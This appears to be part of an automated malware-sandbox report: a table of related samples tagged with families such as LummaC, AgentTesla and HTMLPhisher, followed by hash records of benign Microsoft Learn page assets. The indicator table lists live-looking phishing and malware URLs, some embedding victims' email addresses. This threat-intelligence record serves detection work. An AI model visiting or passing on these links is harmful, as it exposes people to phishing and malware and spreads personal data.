                                                                                                                                                                                                            28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            http://www.tqltrax.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            http://bleedingofficecontagion.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            estimate Cost.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 20.190.160.14
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            6271f898ce5be7dd52b0fc260d0662b3https://cardpayment.microransom.us/XYmdKR004c2prdTQ3eFRYdTZlUlAwSGhsclU2V3JnMWpuZ2h3Njg2emV0U3ZLY1Z4RkpNZm9HbkpHck9SNjFHb01Yem5jSDVSb2RmaXRIWUNvN2g1UHR4NlNzM05yeWg0R2VJSzhzSFlRVTN6UFZHYWpZSUxBeXpsYmtPMjFua1J5RFlLdm5OUVBGRnl2UWRxSjhpUFRwL1VXS1RqNEJjMmJwNkVPOVkvV2o3S3R0MkYzS1VXOG5uS1hHVll2eDdUb3hmcGtBb2VBTUdHc3hweEtXV25WRVZKdDBwWCtVZGtobzFsamp3PS0tYVREdUlIcWNwNFJ5RjAxci0tQWs2bGpCejYzaGsxMWJqSll4TWFNQT09?cid=293298779Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            https://www.google.is/url?q=rafqigacjrkrnnioqkowziyxaiusnluqeulymwebekupzxoc&rct=zolesnudazazmzgsjvwdvqzilxazcumsnbozxtjbwldgyqzgdzrrmmqlnmokqbxpnmciglrj&sa=t&url=amp/ne.ypejwf9.sa.com/floxc/itaal/sf_rand_string_mixed(24)/toto@yahoo.frGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            https://binusianorg-my.sharepoint.com/personal/radja_hizbullah_binus_ac_id/_layouts/15/guestaccess.aspx?share=ETHY_S_rOwNFgVsgBzxZDRgB0fQxIDkLS5qX9M9nLivRaw&e=mq1rkfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            https://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            https://www.cbirc.gov.cn/cn/view/pages/index/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            BOA-everbridge.com-$29,890.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 150.171.27.10
                                                                                                                                                                                                            • 20.234.120.54
                                                                                                                                                                                                            • 2.23.209.193
                                                                                                                                                                                                            • 150.171.28.10
                                                                                                                                                                                                            • 20.223.35.26
                                                                                                                                                                                                            • 2.23.209.150
                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eUpdated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            estimate Cost.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            MV BBG MUARA Ship's Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            PO#83298373729383838392387373873PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                            • 40.113.110.67
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):464328
                                                                                                                                                                                                            Entropy (8bit):5.074669864961383
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                            MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                            SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                            SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                            SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                            Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18477
                                                                                                                                                                                                            Entropy (8bit):5.147347768532056
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                            MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                            SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                            SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                            SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):179335
                                                                                                                                                                                                            Entropy (8bit):5.435182897681627
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVa:Wof3G0NSkNzMeO7z/l3a
                                                                                                                                                                                                            MD5:517954FBCEBC2B0669606202492A4888
                                                                                                                                                                                                            SHA1:404819BEF2964D493DF3CB29102719025BEA48AF
                                                                                                                                                                                                            SHA-256:211DF9427FF68A7AA97490D30BABCEC089295E6219D461DD2946D24FE919DAEF
                                                                                                                                                                                                            SHA-512:21F79D8CB099D874CB2AD32BCE04ADBDE919F3499363E51FE875C0EB409A4EEF555F349351DAB84E39214E26F5320E6E472C0A6A7C06A4CA9EFD1421174CA0C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):18477
                                                                                                                                                                                                            Entropy (8bit):5.147347768532056
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                            MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                            SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                            SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                            SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
